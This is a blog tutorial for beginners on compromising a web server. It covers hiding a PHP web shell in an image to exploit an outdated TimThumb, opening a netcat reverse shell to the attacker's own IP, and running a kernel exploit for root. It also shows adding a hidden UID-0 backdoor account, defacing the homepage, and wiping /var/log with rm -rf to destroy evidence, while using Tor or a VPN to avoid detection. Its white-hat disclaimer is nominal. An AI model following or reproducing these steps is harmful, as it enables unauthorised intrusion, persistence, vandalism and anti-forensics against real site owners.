eXploitLab4 | Information Technology

eXploitLab4 | Information Technology

Defacing, rooting and persistence for beginners


Hey There,
There are quite a few tutorials when it comes to web hacking... but somewhere in all this knowledge, hacking the web server gets lost! So let's get going on this one... This tutorial is aimed at defacing, rooting and creating a persistent presence on the server, for beginners...
Web-Hacking is a huge topic that I could easily discuss for hours.
Today I decided to make a good start by creating this post-tutorial: How to Hack a Server... Everything you need to know.
DISCLAIMER: WHATEVER IT IS THAT YOU LEARN HERE SHOULD BE USED FOR WHITE HAT PURPOSES ONLY
Tools you need:
- Backtrack (www.backtrack-linux.org) OR Kali Linux (http://www.kali.org)
- Firefox (www.mozilla.org/en-US/firefox/new/) Included in Backtrack and Ubuntu
- Netcat (Included in Backtrack) If you are on other linux environments get it from nmap.org/ncat/ .
- iCon2PHP (gnahackteam.wordpress.com/gnahackteam/icon2php/)
- A good shell (iCon2PHP Archive includes three great shells)
- A good VPN or Tor (More explanation below..)
- Acunentix Web Vulnerability Scanner (trial version is also available)
About the Tools:
Backtrack/ Kali
A Linux distribution based on Ubuntu/ Debian. It includes everything you need to become a good hacker. Apart from this, hacking behind a Linux system is better than a Windows one since most Websites are on Linux Servers.
Firefox
Firefox is the best browser for hacking. You can easily configure a proxy and you can download millions of add-ons among which you can find some for Hacking. Find more about Hacky addons for Firefox or you can get my collection from here.
Netcat - Netcat is a powerful networking tool. You will need this to root the server
iCon2PHP & Good Shells - You will use it if you upload any image to an Image Uploader at a Forum or Image Hosting Service. iCon2PHP Archive contains some of the top shells available
Good VPN or TOR (Proxies are good too) - While hacking you need to be anonymous so as not to find you (even if you forget to delete the logs.). A VPN stands for Virtual Private Network and what it does is: hiding your IP, encrypting the data you send and receive to and from the Internet. A good VPN solution for Windows Maschines is ProXPN. However, with VPN connections (especially when you are under a free VPN connection) your connection speed is really slow. So, I wouldn't recommend VPN unless you pay and get a paid account.
What I would recommend is Tor. Tor can be used from its bundle: Vidalia, which is a great tool for Windows, Mac and Linux that uses Proxies all over its network around the world so as to keep you anonymous and changing these Proxies every 5-10 minutes. I believe it is among the best solutions to keep you anonymous if you don't want to pay for a Paid VPN account
Apart from Tor, simple Proxies are good but I wouldn't recommend them as much as I would, Tor.
If I listed the above options according to their reliability :
1. Paid VPN Account at ProXPN
2. Tor
3. Free VPN Account at ProXPN
4. Proxy Connection
Acunetix Web Vulnerability Scanner - Scans for open ports, web vulnerabilities, directory listing. During the scan it lists the vulnerabilities and says how a hacker can exploit it and how to patch it. It also shows the severity of the vulnerability.
The Consultant Edition (For unlimited websites) costs about 3000-7000$.
____________________________________________________________
Starting the Main Tutorial:
So, here is the route we will follow:
Find a Vulnerable Website > Upload a c100 Shell (Hidden in an Image with iCon2PHP) > Rooting the Server > Defacing the Website > Covering your Tracks
-�- Before we begin -�-
-Boot into Kali or Backtrack
-Connect to your VPN or to Tor
-Open Firefox
1. Finding a Vulnerable Website and Information about it:
Acunetix - Open and scan the website (use the standard profile, don't modify anything except if you know what you are doing). For this tutorial our website will be: www.site.com
Let's say we found a vulnerability using which we can upload a remote file (our shell) and have access to the website's files
The Warning should be something like this. It can mention other information or be a completely other warning (like for SQL Injection I will post a Tutorial on this also), too! (Depends on the Vulnerability) What we need at this tutorial is that we can exploit the File Inclusion Attack and Have access to the Website's Files. (This is not the warning we need for this tutorial, but it is related to what we do too.)
OK. Now, we have the site and the path that the vulnerability is. In our example let's say it is here:
The above vulnerability affects WordPress blogs that have installed certain plugins or themes and haven't updated to the latest version of TimThumb, which is a image-editing service on websites.
OK. Acunetix should also mention the OS of the Server. Assuming that ours is a Unix/Linux system (so as to show you how to root it).
For now, we don't have anything else to do with Acunetix
2. Uploading the shell:
Till now, we know:
-The website's blog has a huge vulnerability at TimThumb
-It is hosted on a Unix System
Next, because of the fact that the Vulnerability is located at an outdated TimThumb version, and tim thumb is a service to edit images, we need to upload the shell instead of the image
Thus, download any image (I would recommend a small one) from Google Images. We don't care what it shows.
Generate Output with iCon2PHP
Copy your Image and your Shell to the Folder that iCon2PHP is located
Run the Program and follow the in-program instructions to build the finalImage.php
To avoid any errors while uploading rename the finalImage.php to image.php;.png (instead of png, type the image format your image was jpeg, jpg, gif, bmp, png etc.) This is exactly the same file but it confuses the uploader and thinks that it actually is an image.

Enter the Path of your Image: image.png
Please enter the path to the PHP: GnYshell.php
Entered!
Valid Files!
[...]
File: finalImage.php has been successfully created at the Current Directory
Upload Output to a Server:
Next, upload your image.php;.png into a free server. (000webhost, 0fees etc.)
Go to the vulnerability and type at the URL:
It would be better to create a subdomain like flickr.com (or other big image-hosting service) because sometimes it doesn't accept images from other websites.
Website. Shelled!
OK. Your website is shelled. This means that you should now have your shell uploaded and ready to root the server.
You could easily deface the website now but it would be better if you first rooted the server, so as to cover your tracks quickly.
3. Root the Server so as to be persistent:
Now that you have shelled your website we can start the process to root the server
What is rooting when it comes for Server Hacking?
Rooting a server is the procedure when the hacker acquires root privileges at the whole server. If you don't understand this yet, I reassure you that by the end of the section Rooting a server you will have understood exactly what it is
Let's proceed to rooting
Connect via netcat:
1. Open a port at your router. For this tutorial I will be using 402. (Search Google on how to port forward. It is easier than it seems)
2. Open Terminal
3. Type:
netcat
4. Now type:
-l -n -v -p 402
5.It should have an output like this:
listening on [any] 402 port
6. Now, go to the Back-Connection function at the Shell
7. Complete with the following:
Host:YouIPAddress Port: 402 (or the port you forwarded)
8. Hit connect and Voila! Connected to the server!
Downloading and Executing the Kernel exploit:
1. Now, if you type:
whoami
you will see that you are not root yet
2. To do so we have to download a kernel exploit. The kernel version is mentioned at your shell. Find kernel exploits here
3. Download it to your HDD and then upload it to the server via the Shell. Unzip first, if zipped.
4. Now do the following exploit preparations:
The most usual types of exploits:
+++ Perl (.pl extension)
+++ C (.c extension)
(( If the program is in C you have first to compile it by typing: gcc exploit.c -o exploit ))
Change the permissions of the exploit:
chmod 777 exploit
5. Execute the exploit. Type:
./exploit
6. Root permissions acquired! Type this to ensure:
id
or
whoami
7. Add a new root user:
adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1
where root1 is your desired username
8. Change the password of the new root user:
passwd root1
SUCCESSFULLY ROOTED!
4. Deface the Website:
What is defacing?
Defacing is the procedure when the hacker uploads his own inbox webpage to alter the homepage of a site. In this way, he can boost his reputation or parse a message to the people or the company (which owns the website)
Since you got the website shelled, you just create a nice hacky page in html and upload it via the Shell as inbox.html (Delete or rename the website's one)
5. Cover your tracks:
Till now you were under the anonymity of Tor or ProXPN. You were very safe. However, in order to ensure that it will be impossible for the admin to locate you we have to delete logs.
First of all, Unix based machines have some logs that you have better to either edit or delete.
Common Linux log files name and their usage:
/var/log/message: General message and system related stuff
/var/log/auth.log: Authentication logs
/var/log/kern.log: Kernel logs
/var/log/cron.log: Crond logs (cron job)
/var/log/maillog: Mail server logs
/var/log/qmail/ : Qmail log directory (more files inside this directory)
/var/log/httpd/: Apache access and error logs directory
/var/log/lighttpd: Lighttpd access and error logs directory
/var/log/boot.log : System boot log
/var/log/mysqld.log: MySQL database server log file
/var/log/secure: Authentication log
/var/log/utmp or /var/log/wtmp : Login records file
/var/log/yum.log: Yum log files
In short /var/log is the location where you should find all Linux logs file
To delete all of them by once type:
su root1
rm -rf /var/log
mkdir /var/log
That's about it! This is the method being used by most black hats when they want to deface servers and get persistent access to it.
Hope this helps
WTHack
Can we hack you before the hackers do?

Post a Comment
Thanks for your comment
Powered by Blogger.



close